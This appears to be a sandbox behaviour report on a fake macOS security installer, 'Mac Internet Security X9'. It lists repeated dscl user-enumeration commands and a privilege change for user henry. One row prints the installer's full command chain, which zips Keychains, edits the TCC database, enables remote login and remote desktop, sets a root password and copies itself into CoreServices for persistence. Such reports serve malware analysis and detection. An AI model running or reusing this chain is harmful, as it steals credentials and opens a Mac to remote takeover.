| Source: /bin/sh (PID: 548) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users | Jump to behavior |
| Source: /bin/sh (PID: 549) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid | Jump to behavior |
| Source: /bin/sh (PID: 550) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_analyticsd uid | Jump to behavior |
| Source: /bin/sh (PID: 551) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid | Jump to behavior |
| Source: /bin/sh (PID: 552) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_applepay uid | Jump to behavior |
| Source: /bin/sh (PID: 553) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid | Jump to behavior |
| Source: /bin/sh (PID: 554) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid | Jump to behavior |
| Source: /bin/sh (PID: 555) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appstore uid | Jump to behavior |
| Source: /bin/sh (PID: 556) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid | Jump to behavior |
| Source: /bin/sh (PID: 557) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid | Jump to behavior |
| Source: /bin/sh (PID: 558) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid | Jump to behavior |
| Source: /bin/sh (PID: 559) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid | Jump to behavior |
| Source: /bin/sh (PID: 560) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid | Jump to behavior |
| Source: /bin/sh (PID: 561) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid | Jump to behavior |
| Source: /bin/sh (PID: 562) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_captiveagent uid | Jump to behavior |
| Source: /bin/sh (PID: 563) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid | Jump to behavior |
| Source: /bin/sh (PID: 564) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid | Jump to behavior |
| Source: /bin/sh (PID: 565) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cmiodalassistants uid | Jump to behavior |
| Source: /bin/sh (PID: 566) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid | Jump to behavior |
| Source: /bin/sh (PID: 567) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid | Jump to behavior |
| Source: /bin/sh (PID: 568) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ctkd uid | Jump to behavior |
| Source: /bin/sh (PID: 569) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid | Jump to behavior |
| Source: /bin/sh (PID: 570) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid | Jump to behavior |
| Source: /bin/sh (PID: 571) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid | Jump to behavior |
| Source: /bin/sh (PID: 572) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_datadetectors uid | Jump to behavior |
| Source: /bin/sh (PID: 573) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid | Jump to behavior |
| Source: /bin/sh (PID: 574) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid | Jump to behavior |
| Source: /bin/sh (PID: 575) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid | Jump to behavior |
| Source: /bin/sh (PID: 576) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid | Jump to behavior |
| Source: /bin/sh (PID: 577) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid | Jump to behavior |
| Source: /bin/sh (PID: 578) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid | Jump to behavior |
| Source: /bin/sh (PID: 579) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid | Jump to behavior |
| Source: /bin/sh (PID: 580) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid | Jump to behavior |
| Source: /bin/sh (PID: 581) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_findmydevice uid | Jump to behavior |
| Source: /bin/sh (PID: 582) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_fpsd uid | Jump to behavior |
| Source: /bin/sh (PID: 583) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid | Jump to behavior |
| Source: /bin/sh (PID: 584) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid | Jump to behavior |
| Source: /bin/sh (PID: 585) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid | Jump to behavior |
| Source: /bin/sh (PID: 586) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_hidd uid | Jump to behavior |
| Source: /bin/sh (PID: 587) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid | Jump to behavior |
| Source: /bin/sh (PID: 588) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid | Jump to behavior |
| Source: /bin/sh (PID: 589) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid | Jump to behavior |
| Source: /bin/sh (PID: 590) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid | Jump to behavior |
| Source: /bin/sh (PID: 591) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid | Jump to behavior |
| Source: /bin/sh (PID: 592) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid | Jump to behavior |
| Source: /bin/sh (PID: 593) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid | Jump to behavior |
| Source: /bin/sh (PID: 594) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid | Jump to behavior |
| Source: /bin/sh (PID: 595) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid | Jump to behavior |
| Source: /bin/sh (PID: 596) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid | Jump to behavior |
| Source: /bin/sh (PID: 597) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid | Jump to behavior |
| Source: /bin/sh (PID: 598) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid | Jump to behavior |
| Source: /bin/sh (PID: 599) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbtgt uid | Jump to behavior |
| Source: /bin/sh (PID: 600) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_launchservicesd uid | Jump to behavior |
| Source: /bin/sh (PID: 601) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lda uid | Jump to behavior |
| Source: /bin/sh (PID: 602) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_locationd uid | Jump to behavior |
| Source: /bin/sh (PID: 603) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lp uid | Jump to behavior |
| Source: /bin/sh (PID: 604) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mailman uid | Jump to behavior |
| Source: /bin/sh (PID: 605) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mbsetupuser uid | Jump to behavior |
| Source: /bin/sh (PID: 606) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mcxalr uid | Jump to behavior |
| Source: /bin/sh (PID: 607) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mdnsresponder uid | Jump to behavior |
| Source: /bin/sh (PID: 608) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mobileasset uid | Jump to behavior |
| Source: /bin/sh (PID: 609) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mysql uid | Jump to behavior |
| Source: /bin/sh (PID: 610) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netbios uid | Jump to behavior |
| Source: /bin/sh (PID: 611) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netstatistics uid | Jump to behavior |
| Source: /bin/sh (PID: 612) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_networkd uid | Jump to behavior |
| Source: /bin/sh (PID: 613) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlsessiond uid | Jump to behavior |
| Source: /bin/sh (PID: 614) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlstoraged uid | Jump to behavior |
| Source: /bin/sh (PID: 615) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ondemand uid | Jump to behavior |
| Source: /bin/sh (PID: 616) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postfix uid | Jump to behavior |
| Source: /bin/sh (PID: 617) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postgres uid | Jump to behavior |
| Source: /bin/sh (PID: 618) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_qtss uid | Jump to behavior |
| Source: /bin/sh (PID: 619) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sandbox uid | Jump to behavior |
| Source: /bin/sh (PID: 620) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_screensaver uid | Jump to behavior |
| Source: /bin/sh (PID: 621) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_scsd uid | Jump to behavior |
| Source: /bin/sh (PID: 622) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_securityagent uid | Jump to behavior |
| Source: /bin/sh (PID: 623) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_serialnumberd uid | Jump to behavior |
| Source: /bin/sh (PID: 624) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_softwareupdate uid | Jump to behavior |
| Source: /bin/sh (PID: 625) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_spotlight uid | Jump to behavior |
| Source: /bin/sh (PID: 626) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sshd uid | Jump to behavior |
| Source: /bin/sh (PID: 627) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_svn uid | Jump to behavior |
| Source: /bin/sh (PID: 628) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_taskgated uid | Jump to behavior |
| Source: /bin/sh (PID: 629) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_teamsserver uid | Jump to behavior |
| Source: /bin/sh (PID: 630) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timed uid | Jump to behavior |
| Source: /bin/sh (PID: 631) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timezone uid | Jump to behavior |
| Source: /bin/sh (PID: 632) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_tokend uid | Jump to behavior |
| Source: /bin/sh (PID: 633) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_trustevaluationagent uid | Jump to behavior |
| Source: /bin/sh (PID: 634) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_unknown uid | Jump to behavior |
| Source: /bin/sh (PID: 635) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_update_sharing uid | Jump to behavior |
| Source: /bin/sh (PID: 636) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_usbmuxd uid | Jump to behavior |
| Source: /bin/sh (PID: 637) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_uucp uid | Jump to behavior |
| Source: /bin/sh (PID: 638) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_warmd uid | Jump to behavior |
| Source: /bin/sh (PID: 639) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_webauthserver uid | Jump to behavior |
| Source: /bin/sh (PID: 640) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_windowserver uid | Jump to behavior |
| Source: /bin/sh (PID: 641) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_www uid | Jump to behavior |
| Source: /bin/sh (PID: 642) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_wwwproxy uid | Jump to behavior |
| Source: /bin/sh (PID: 643) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcsbuildagent uid | Jump to behavior |
| Source: /bin/sh (PID: 644) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcscredserver uid | Jump to behavior |
| Source: /bin/sh (PID: 645) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xserverdocs uid | Jump to behavior |
| Source: /bin/sh (PID: 646) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uid | Jump to behavior |
| Source: /bin/sh (PID: 649) | Shell process: /bin/launchctl list com.apple.screensharing | Jump to behavior |
| Source: /bin/sh (PID: 666) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivs | Jump to behavior |
| Source: /bin/sh (PID: 667) | Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -create /Local/Target/Users/henry naprivs 1073742079 | Jump to behavior |
| Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Shell command executed: /bin/bash -c mkdir ~/.calisto/ | Jump to behavior |
| Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Shell command executed: /bin/bash -c echo | sudo -S zip -r ~/.calisto/KC.zip ~/Library/Keychains/ /Library/Keychains/ && ifconfig > ~/.calisto/network.dat && echo henry > ~/.calisto/cred.dat && zip -r ~/.calisto/calisto.zip ~/.calisto/ && sudo /usr/bin/sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db 'INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL) ' && sudo systemsetup -setremotelogin on && sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers && dsenableroot -p -r aGNOStIC7890!!! && sudo systemsetup -setcomputersleep Never && sudo cp -R /Volumes/Mac\ Internet\ Security\ X9/Mac\ Internet\ Security\ X9\ Installer.app /System/Library/CoreServices/launchb.app && sudo mv /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac\ Internet\ Security\ X9\ Installer /System/Library/CoreServices/launchb.app/Contents/M | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 548) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -list /Local/Target/Users | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 549) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_amavisd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 550) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_analyticsd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 551) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appleevents' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 552) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_applepay' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 553) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appowner' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 554) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appserver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 555) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_appstore' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 556) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ard' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 557) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_assetcache' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 558) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_astris' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 559) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_atsserver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 560) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_avbdeviced' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 561) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_calendar' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 562) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_captiveagent' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 563) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ces' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 564) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_clamav' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 565) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cmiodalassistants' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 566) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coreaudiod' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 567) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_coremediaiod' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 568) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ctkd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 569) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvmsroot' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 570) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cvs' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 571) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_cyrus' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 572) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_datadetectors' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 573) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devdocs' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 574) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_devicemgr' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 575) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_displaypolicyd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 576) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_distnote' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 577) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovecot' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 578) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dovenull' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 579) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_dpaudio' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 580) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_eppc' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 581) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_findmydevice' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 582) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_fpsd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 583) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 584) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 585) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 586) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_hidd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 587) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 588) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 589) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 590) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 591) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 592) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 593) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 594) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 595) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 596) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 597) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 598) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 599) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbtgt' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 600) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_launchservicesd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 601) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_lda' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 602) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_locationd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 603) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_lp' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 604) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mailman' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 605) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mbsetupuser' uid | Jump to behavior |
